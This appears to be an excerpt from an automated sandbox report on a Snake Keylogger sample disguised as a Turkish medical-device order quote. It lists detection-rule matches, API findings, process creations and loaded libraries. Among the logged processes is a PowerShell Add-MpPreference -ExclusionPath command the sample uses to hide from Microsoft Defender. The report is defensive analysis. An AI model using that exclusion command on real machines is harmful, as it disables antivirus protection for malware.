                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, oBXJZxdiv8wFS1Sq6H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, oBXJZxdiv8wFS1Sq6H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, oBXJZxdiv8wFS1Sq6H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, chcZUZyrDJr55lSd5d.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/6@4/4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.logJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMutant created: \Sessions\1\BaseNamedObjects\EOxaNLpbCQretGUOjgIPYE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uokvwa4.ssz.ps1Jump to behavior
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeReversingLabs: Detection: 34%
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeVirustotal: Detection: 34%
                  Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: dnsapi.dllJump to behavior
